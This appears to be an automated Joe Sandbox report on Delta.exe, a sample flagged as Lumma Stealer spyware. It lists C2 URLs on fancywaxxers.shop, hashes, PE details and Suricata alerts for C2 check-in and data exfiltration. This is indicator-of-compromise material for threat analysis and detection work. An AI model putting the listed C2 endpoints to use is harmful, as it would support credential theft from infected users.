https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiS	Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Delta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/w	Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/oft.coc	Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/k	Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/ll	Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/micros	Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Delta.exe, 00000002.00000003.1716411891.00000000054C5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/C	Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943650597.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328560798.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/5	Delta.exe, 00000002.00000003.1715106339.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/api3	Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Delta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/	Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/apiUserUserUser	Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/api:	Delta.exe, 00000002.00000002.2943602856.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.microsoft.coc	Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fancywaxxers.shop/3	Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.96.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582864
Start date and time:	2024-12-31 17:20:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Delta.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 19 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Delta.exe, PID 7396 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Delta.exe

Simulations

Behavior and APIs

Time	Type	Description
11:21:14	API Interceptor	8x Sleep call for process: Delta.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.52.90
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	104.21.24.64
	over.ps1	Get hash	malicious	Vidar	Browse	172.64.41.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	172.67.217.81
	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse	104.16.79.73
	http://knoxoms.com	Get hash	malicious	Unknown	Browse	188.114.97.3
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	DypA6KbLrn.lnk	Get hash	malicious	Unknown	Browse	104.21.87.65

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.96.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	PO#5_tower_Dec162024.cmd	Get hash	malicious	DBatLoader	Browse	104.21.96.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.96.1
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.96.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.820899716469667
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Delta.exe
File size:	813'568 bytes
MD5:	24a858ebb9fc24d58bb3615386ce0f43
SHA1:	eaf287a3846ac77a908d4ec4468a49fedc207963
SHA256:	ddd1e3c7b4d8a8670e7c6d9a3bbd7e30d1c5658ed38e41a20efdee201b5239f7
SHA512:	492eb513fa4c6f65ec8bac9b5e08a2aa616beace8e6552469370f352b7491f4ea08b5f6c3e4dd6fdd5dda16c9b74c3d2364b71335e1780074b23f1df7a8f26e9
SSDEEP:	12288:r3K1Pp+lMeB8BQIzbjh22SbjqPVRc5ga0VQIzbjh22SbjqPVRc5ga0J:TK1PSMZWIzbtpSfqmgaIzbtpSfqmgZ
TLSH:	FC050251B981C072CD63253364F5DFBA462EF9200B125ADF57C80BB9DF252D28E31B6A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a2e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	019ac8c6e24f80fb88de699b6749f599

Entrypoint Preview

Instruction
call 00007F11C8D975AAh
jmp 00007F11C8D9740Dh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F11C8D975A6h
test esi, ecx
jne 00007F11C8D975C8h
call 00007F11C8D975D1h
mov ecx, eax
cmp ecx, edi
jne 00007F11C8D975A9h
mov ecx, BB40E64Fh
jmp 00007F11C8D975B0h
test esi, ecx
jne 00007F11C8D975ACh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8D8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E894h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E890h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E920h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB8h
call dword ptr [0042E8F8h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e6c4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x35000	0x1b90	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e834	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x247da	0x24800	ba0610d1e4ecb6f5f64959d9eb5b455a	False	0.5549951840753424	data	6.559506263512015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9eb4	0xa000	53eba87ddc7d2455b0ac2836680b1660	False	0.428271484375	DOS executable (COM)	4.9181666163124085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2280	0x1600	112d0c9e43893ae5b7f96d23807996ac	False	0.39506392045454547	data	4.581141173428789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x33000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xe8	0x200	03d6bf5d1e31277fc8fb90374111d794	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x35000	0x1b90	0x1c00	3080b38ba0e27b64b3ab5ca0f93c1c7c	False	0.7785993303571429	data	6.532705218372571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x37000	0x4a200	0x4a200	025acdb830e33bac6903c9b1a0c9e6a9	False	1.0003326570404723	data	7.99943461927735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS	0x82000	0x4a200	0x4a200	025acdb830e33bac6903c9b1a0c9e6a9	False	1.0003326570404723	data	7.99943461927735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x34060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T17:21:14.445250+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.4	59757	1.1.1.1	53	UDP
2024-12-31T17:21:14.939261+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:14.939261+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:15.444803+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:15.444803+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-31T17:21:15.933780+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:15.933780+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:16.398944+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:16.398944+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.96.1	443	TCP
2024-12-31T17:21:17.121915+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49732	104.21.96.1	443	TCP
2024-12-31T17:21:17.121915+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.96.1	443	TCP
2024-12-31T17:21:17.787374+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49732	104.21.96.1	443	TCP
2024-12-31T17:21:18.350782+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-31T17:21:18.350782+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-31T17:21:19.635018+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49734	104.21.96.1	443	TCP
2024-12-31T17:21:19.635018+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.96.1	443	TCP
2024-12-31T17:21:21.084859+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49735	104.21.96.1	443	TCP
2024-12-31T17:21:21.084859+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.96.1	443	TCP
2024-12-31T17:21:22.466515+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49736	104.21.96.1	443	TCP
2024-12-31T17:21:22.466515+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.96.1	443	TCP
2024-12-31T17:21:24.584267+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-31T17:21:24.584267+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-31T17:21:25.028327+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:21:14.464581013 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:14.464634895 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:14.464699984 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:14.468256950 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:14.468275070 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:14.939062119 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:14.939260960 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:14.956257105 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:14.956269979 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:14.956558943 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.000106096 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.005577087 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.005608082 CET	49730	443	192.168.2.4	104.21.96.1
